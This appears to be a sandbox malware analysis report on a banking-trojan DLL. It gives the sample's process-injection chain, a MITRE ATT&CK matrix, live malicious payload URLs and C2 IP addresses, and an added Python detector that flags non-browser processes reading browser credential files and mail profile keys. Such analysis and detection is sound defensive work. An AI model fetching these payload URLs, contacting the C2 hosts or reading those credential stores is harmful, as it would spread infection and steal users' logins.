Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\appdata\local\google\chrome\user data\default\cookies
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002
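explorer.exe has no reason of its own to open Chrome's or Edge's Login Data and Cookies files or the Windows Live Mail and Outlook profile keys; the process doing it here is the injected host. The Python below is an added example, not report or Ursnif code: it classifies such access events by path and owning image, and raises a verdict only when a single non-browser image touches both browser credential stores and mail-client profiles. The event list is constructed from the entries above plus one chrome.exe line as a benign control; CRED_STORE_RE, BROWSER_IMAGES and the category names are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed input: (image, event kind, path) triples taken from the explorer.exe
# "Key opened" / "File opened" entries above, plus a chrome.exe line as a control.
SAMPLE_ACCESS = [
    ("explorer.exe", "reg", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Live Mail"),
    ("explorer.exe", "reg", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
    ("explorer.exe", "file", r"C:\Users\user\appdata\local\google\chrome\user data\default\login data"),
    ("explorer.exe", "file", r"C:\Users\user\appData\local\microsoft\edge\user data\default\login data"),
    ("explorer.exe", "file", r"C:\Users\user\appdata\local\google\chrome\user data\default\cookies"),
    ("explorer.exe", "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008"),
    ("explorer.exe", "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index"),
    ("chrome.exe", "file", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]

# Chromium profile files holding saved logins, session cookies and autofill data.
CRED_STORE_RE = re.compile(r"\\user data\\[^\\]+\\(login data|cookies|web data)$", re.I)
BROWSER_CACHE_RE = re.compile(r"\\user data\\[^\\]+\\cache\\", re.I)
# Registry roots consulted by mail-credential stealers (lower-case substrings).
MAIL_KEY_MARKERS = ("\\software\\microsoft\\windows live mail",
                    "\\windows messaging subsystem\\profiles")
# Assumption of this example: images that own these files and may open them.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}


def classify(image, kind, path):
    """Label one access event, or return None when it is not interesting."""
    img, p = image.lower(), path.lower()
    if kind == "file":
        if img in BROWSER_IMAGES:
            return None                      # the browser reading its own profile
        if CRED_STORE_RE.search(p):
            return "browser_credential_store"
        if BROWSER_CACHE_RE.search(p):
            return "browser_cache"           # weaker signal: history/web-inject reconnaissance
    elif kind == "reg" and any(m in p for m in MAIL_KEY_MARKERS):
        return "mail_client_profile"
    return None


def summarize(events):
    """Count findings per (image, category)."""
    counts = defaultdict(int)
    for image, kind, path in events:
        label = classify(image, kind, path)
        if label:
            counts[(image.lower(), label)] += 1
    return dict(counts)


def verdict(summary):
    """Images that touched both browser credential stores and mail profiles: the
    harvesting pattern of this report. Cache-only access alone does not qualify."""
    by_image = defaultdict(set)
    for image, label in summary:
        by_image[image].add(label)
    return sorted(img for img, labels in by_image.items()
                  if {"browser_credential_store", "mail_client_profile"} <= labels)


if __name__ == "__main__":
    s = summarize(SAMPLE_ACCESS)
    for (image, label), n in sorted(s.items()):
        print(f"{image:14s} {label:26s} {n}")
    print("harvesting:", verdict(s))
```

On a real endpoint the same logic applies to Sysmon event ID 11/13 or file-audit events; the owning-image allow-list is what keeps the rule quiet during normal browsing, so keep it to the browsers actually deployed rather than a generic list.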

                      Remote Access Functionality

Source: Yara match | File sources: the same 43 memory dumps, 7 process memory spaces (MEMORYSTR) and 7 unpacked PEs listed under Stealing of Sensitive Information above.
MITRE ATT&CK matrix (the report's 14-column view, flattened to one line per tactic; cells are in the original row order, and a number in front of a technique is the report's hit marker for that technique, reproduced as rendered; cells without a number are the matrix template with no hits):

Initial Access: 1 Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application | Supply Chain Compromise | Compromise Software Dependencies and Development Tools | Compromise Software Supply Chain
Execution: 11 Windows Management Instrumentation | 2 Native API | 1 Command and Scripting Interpreter | At (Windows) | Cron | Launchd | Scheduled Task | Command and Scripting Interpreter | PowerShell | AppleScript | Windows Command Shell | Unix Shell
Persistence: 1 Valid Accounts | Boot or Logon Initialization Scripts | Logon Script (Windows) | Logon Script (Mac) | Network Logon Script | Rc.common | Startup Items | Scheduled Task/Job | At (Linux) | At (Windows) | Cron | Launchd
Privilege Escalation: 1 Valid Accounts | 1 Access Token Manipulation | 813 Process Injection | Logon Script (Mac) | Network Logon Script | Rc.common | Startup Items | Scheduled Task/Job | At (Linux) | At (Windows) | Cron | Launchd
Defense Evasion: 1 Obfuscated Files or Information | 1 File Deletion | 4 Rootkit | 1 Masquerading | 1 Valid Accounts | 1 Access Token Manipulation | 31 Virtualization/Sandbox Evasion | 813 Process Injection | 1 Rundll32 | Invalid Code Signature | Right-to-Left Override | Rename System Utilities
Credential Access: 1 OS Credential Dumping | 3 Credential API Hooking | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow | Network Sniffing | Input Capture | Keylogging
Discovery: 1 System Time Discovery | 1 Account Discovery | 4 File and Directory Discovery | 27 System Information Discovery | 1 Query Registry | 111 Security Software Discovery | 31 Virtualization/Sandbox Evasion | 3 Process Discovery | 1 Application Window Discovery | 1 System Owner/User Discovery | 11 Remote System Discovery | 3 System Network Configuration Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Shared Webroot | Software Deployment Tools | Taint Shared Content | Replication Through Removable Media | Component Object Model and Distributed COM
Collection: 11 Archive Collected Data | 1 Data from Local System | 11 Email Collection | 3 Credential API Hooking | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged | Local Data Staging | Remote Data Staging | Screen Capture
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration Over Physical Medium | Exfiltration over USB
Command and Control: 2 Ingress Tool Transfer | 2 Encrypted Channel | 3 Non-Application Layer Protocol | 13 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols | File Transfer Protocols | Mail Protocols | DNS
Network Effects: Eavesdrop on Insecure Network Communication | Exploit SS7 to Redirect Phone Calls/SMS | Exploit SS7 to Track Device Location | SIM Card Swap | Manipulate Device Communication | Jamming or Denial of Service | Rogue Wi-Fi Access Points | Downgrade to Insecure Protocols | Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization | Remotely Wipe Data Without Authorization | Obtain Device Cloud Backups | Carrier Billing Fraud | Manipulate App Store Rankings or Ratings | Abuse Accessibility Features
Impact: 1 Data Encrypted for Impact | Device Lockout | Delete Device Data | Data Encrypted for Impact | Generate Fraudulent Advertising Revenue | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery
Behavior Graph
Behavior Graph ID: 620323
Sample: 2oCOO5LbPu.dll
Start date: 04/05/2022
Architecture: WINDOWS
Score: 100

Start (node 2)
• DNS: 8.8.8.8.in-addr.arpa, 1.0.0.127.in-addr.arpa
• Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
• Started: loaddll32.exe (12), mshta.exe (14)

loaddll32.exe (12)
• Started: cmd.exe (16)

mshta.exe (14)
• Started: powershell.exe (18)

cmd.exe (16)
• Started: rundll32.exe (21)

powershell.exe (18)
• Signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
• Started: csc.exe (25), csc.exe (28), conhost.exe (30)

rundll32.exe (21)
• Network: 185.189.151.28, 49761, 80, AS-SOFTPLUSCH, Switzerland
• Signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
• Started: control.exe (32)

csc.exe (25)
• Dropped: C:\Users\user\AppData\Local\...\dyznokx3.dll (PE32)
• Started: cvtres.exe (35)

csc.exe (28)
• Dropped: C:\Users\user\AppData\Local\...\ykprd3xj.dll (PE32)
• Started: cvtres.exe (37)

control.exe (32)
• Signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
• Injected: explorer.exe (39)
• Started: rundll32.exe (43)

explorer.exe (39, injected)
• Network: 193.56.146.127, 49823, 80, LVLT-10753US, unknown; cabrioxmdes.at 116.121.62.237, 49825, 49836, 49845, CJNET-ASCheiljedangCoIncKR, Korea Republic of; gamexperts.net
• Signatures: System process connects to network (likely due to code injection or exploit); Tries to steal Mail credentials (via file / registry access); Changes memory attributes in foreign processes to executable or writable; 8 other signatures
• Started: cmd.exe (45), cmd.exe (48), cmd.exe (50), 4 other processes (52)

cmd.exe (45)
• Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks; Uses nslookup.exe to query domains
• Started: PING.EXE (54), conhost.exe (57)

cmd.exe (48)
• Started: nslookup.exe (59), conhost.exe (62)

cmd.exe (50)
• Started: conhost.exe (64)

4 other processes (52)
• Started: conhost.exe (66)

PING.EXE (54)
• Network: 192.168.2.1, unknown, unknown

nslookup.exe (59)
• DNS: 222.222.67.208.in-addr.arpa, resolver1.opendns.com, myip.opendns.com
• Signatures: May check the online IP address of the machine

Source | Detection | Scanner | Label
2oCOO5LbPu.dll | 50% | ReversingLabs | Win32.Trojan.Zenpak
2oCOO5LbPu.dll | 100% | Joe Sandbox ML |
                      No Antivirus matches
Source | Detection | Scanner | Label
2.2.rundll32.exe.36d0000.0.unpack | 100% | Avira | HEUR/AGEN.1245293
                      No Antivirus matches
Source | Detection | Scanner | Label
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
http://curlmyip.net | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://curlmyip.netJv1GYc8A8hCBIeVDfile://c: | 0% | Avira URL Cloud | safe
http://ns.adobp/ | 0% | Avira URL Cloud | safe
http://193.56.146.127/stilak32.rar | 100% | Avira URL Cloud | malware
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif | 100% | Avira URL Cloud | malware
http://ns.adobe.cmg | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://193.56.146.127/stilak64.rar | 100% | Avira URL Cloud | malware
http://crl.osofts/Microt0 | 0% | URL Reputation | safe
http://185.189.151.28/drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk | 0% | Avira URL Cloud | safe
http://193.56.146.127/cook32.rar | 100% | Avira URL Cloud | malware
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
http://185.189.151.28/drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp | 100% | Avira URL Cloud | malware
https://www.pango.co/privacy | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://185.189.151.28/drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk | 0% | Avira URL Cloud | safe
http://ns.adobe.ux | 0% | Avira URL Cloud | safe
http://193.56.146.127/cook64.rar | 100% | Avira URL Cloud | malware
http://ns.micro/1 | 0% | Avira URL Cloud | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
l-0007.l-dc-msedge.net | 13.107.43.16 | true | true | | unknown
cabrioxmdes.at | 116.121.62.237 | true | true | | unknown
myip.opendns.com | 102.129.143.40 | true | false | | high
resolver1.opendns.com | 208.67.222.222 | true | false | | high
gamexperts.net | unknown | unknown | true | | unknown
1.0.0.127.in-addr.arpa | unknown | unknown | true | | unknown
222.222.67.208.in-addr.arpa | unknown | unknown | true | | unknown
8.8.8.8.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://193.56.146.127/stilak32.rar | true | Avira URL Cloud: malware | unknown
http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif | true | Avira URL Cloud: malware | unknown
http://193.56.146.127/stilak64.rar | true | Avira URL Cloud: malware | unknown
http://185.189.151.28/drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk | true | Avira URL Cloud: safe | unknown
http://193.56.146.127/cook32.rar | true | Avira URL Cloud: malware | unknown
http://185.189.151.28/drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk | true | Avira URL Cloud: safe | unknown
http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp | true | Avira URL Cloud: malware | unknown
http://185.189.151.28/drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk | true | Avira URL Cloud: safe | unknown
http://193.56.146.127/cook64.rar | true | Avira URL Cloud: malware | unknown
http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp | true | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
193.56.146.127 | unknown | unknown | 10753 | LVLT-10753, US | true
116.121.62.237 | cabrioxmdes.at | Korea Republic of | 9578 | CJNET-ASCheiljedangCoInc, KR | true
185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUS, CH | true
                                                        IP
                                                        192.168.2.1
                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                        Analysis ID:620323
Start date and time: 04/05/2022 16:17:34 (2022-05-04 16:17:34 +02:00)
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 12m 22s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Sample file name:2oCOO5LbPu.dll
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:48
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:4
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.bank.troj.spyw.evad.winDLL@61/27@11/4
                                                        EGA Information:
                                                        • Successful, ratio: 75%
                                                        HDC Information:
                                                        • Successful, ratio: 20.6% (good quality ratio 19.7%)
                                                        • Quality average: 82.2%
                                                        • Quality standard deviation: 27%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 161
                                                        • Number of non-executed functions: 210
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .dll
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Override analysis time to 240s for rundll32
                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.16, 13.107.43.16
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, time.windows.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com
• Execution Graph export aborted for target mshta.exe, PID 6576 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • VT rate limit hit for: 2oCOO5LbPu.dll
Time | Type | Description
16:19:30 | API Interceptor | 33x Sleep call for process: powershell.exe modified
Match: 116.121.62.237
Associated Sample Name / URL | Detection | Context
sMkn7O6QSL.exe | malicious | fuyt.org/files/1/build3.exe
yc4156tWck.exe | malicious | fuyt.org/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
zSUK57qqvS.exe | malicious | coralee.at/upload/
7WSej7fCUu.exe | malicious | fuyt.org/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
Dk3DP1at3Z.exe | malicious | fuyt.org/test1/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C
jpnV6Axa8Q.exe | malicious | fuyt.org/fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C
eTV0IkGBnz.exe | malicious | linislominyt11.at/
tlj7AJm3AK.exe | malicious | coralee.at/upload/
7dfd.exe | malicious | algrcabel.ru/upload/
Xy2V4EFSo7.exe | malicious | coralee.at/upload/
tz1gBLhzCj.exe | malicious | pjure.at/upload/
JICHPAw7wi.exe | malicious | dollybuster.at/upload/
Bdxi4IJGUJ.exe | malicious | dollybuster.at/upload/
N1hAmPNziA.exe | malicious | dollybuster.at/upload/
KC9YFSn61O.exe | malicious | fuyt.org/files/1/build3.exe
3k6d7mS5Yq.exe | malicious | abpa.at/upload/
bZqr9adPQd.exe | malicious | rate0000my7777poo.com/cookies
m3Kj74OHkx.exe | malicious | rate0000my7777poo.com/loaderRules
K17SGkGOJM.exe | malicious | nahbleiben.at/upload/
Heb8EbCSwP.exe | malicious | amogohuigotuli.at/
Match: myip.opendns.com
Associated Sample Name / URL | Detection | Context
EIo7Dh2fzn.dll | malicious | 102.129.143.30
d6YCUW421p.dll | malicious | 102.129.143.53
cmicPQEC.exe | malicious | 84.17.52.18
624c5d1e2a846.dll | malicious | 102.129.143.67
sawepnTfU6.exe | malicious | 102.129.143.61
status.dll | malicious | 102.129.143.42
lia.exe | malicious | 102.129.143.64
gozi.exe | malicious | 102.129.143.64
agent_installer (1).exe | malicious | 102.129.143.62
agent_installer (1).exe | malicious | 102.129.143.62
2GEg45PlG9.exe | malicious | 84.17.52.63
FpYf5EGDO9.exe | malicious | 84.17.52.63
anIV2qJeLD.exe | malicious | 84.17.52.63
gECym.dll | malicious | 102.129.143.33
data.dll | malicious | 102.129.143.57
test1.dll | malicious | 102.129.143.57
test1.dll | malicious | 185.32.222.18
97Ys56eAFo.dll | malicious | 84.17.52.9
new_working_conditions[2021.09.23_12-51].xlsb | malicious | 84.17.52.9
OcEyzBswGm.exe | malicious | 84.17.52.41
Match: cabrioxmdes.at
Associated Sample Name / URL | Detection | Context
EIo7Dh2fzn.dll | malicious | 210.92.250.133
624c5d1e2a846.dll | malicious | 190.219.109.25
Match: l-0007.l-dc-msedge.net
Associated Sample Name / URL | Detection | Context
rXN8OIpbzz.dll | malicious | 13.107.43.16
Invoice#396.html | malicious | 13.107.43.16
Urgentn#U00a1 objedn#U00a0vka.pdf.exe | malicious | 13.107.43.16
pDut.dll | malicious | 13.107.43.16
HxEWwh74qT.dll | malicious | 13.107.43.16
6253ed88d7cd5.dll | malicious | 13.107.43.16
624c84a8263d3.dll | malicious | 13.107.43.16
Match: LVLT-10753US
Associated Sample Name / URL | Detection | Context
EAlEfM79TW | malicious | 94.154.174.151
VJAGa1CbxA | malicious | 168.215.26.46
nhz2J0ywiS | malicious | 200.1.79.144
4B3zH33K2M | malicious | 147.207.148.242
x86 | malicious | 94.154.174.138
cJtqATXS0F | malicious | 170.41.159.0
a4KSkrzwqB | malicious | 148.57.74.34
7nSmJgc4Js.exe | malicious | 193.56.146.76
BXVjfEdYoO | malicious | 94.154.174.170
fFSykqb6nK | malicious | 94.154.174.120
Tsunami.arm7 | malicious | 94.154.174.147
6DeCg8WTgE | malicious | 148.57.27.150
2Pnddx5rjX | malicious | 94.154.174.116
DJowS0XtNv | malicious | 208.51.98.63
i686-20220428-2146 | malicious | 94.154.174.109
lOBVgjoW7K | malicious | 94.154.174.164
arm7-20220426-0843 | malicious | 149.150.206.198
d6YCUW421p.dll | malicious | 193.56.146.148
o2AHUUgivh | malicious | 148.57.27.116
i586-20220420-0452 | malicious | 147.207.196.184
Match: CJNET-ASCheiljedangCoIncKR
Associated Sample Name / URL | Detection | Context
ABRg8o1DEa | malicious | 116.121.31.133
b3astmode.x86 | malicious | 154.10.23.45
sMkn7O6QSL.exe | malicious | 116.121.62.237
yc4156tWck.exe | malicious | 116.121.62.237
7C4A7EN74j.exe | malicious | 116.121.62.237
zSUK57qqvS.exe | malicious | 116.121.62.237
7WSej7fCUu.exe | malicious | 116.121.62.237
Dk3DP1at3Z.exe | malicious | 116.121.62.237
jpnV6Axa8Q.exe | malicious | 116.121.62.237
eTV0IkGBnz.exe | malicious | 116.121.62.237
tlj7AJm3AK.exe | malicious | 116.121.62.237
7dfd.exe | malicious | 116.121.62.237
HQ3kyqBrJ7.exe | malicious | 116.121.62.237
Xy2V4EFSo7.exe | malicious | 116.121.62.237
tz1gBLhzCj.exe | malicious | 116.121.62.237
JICHPAw7wi.exe | malicious | 116.121.62.237
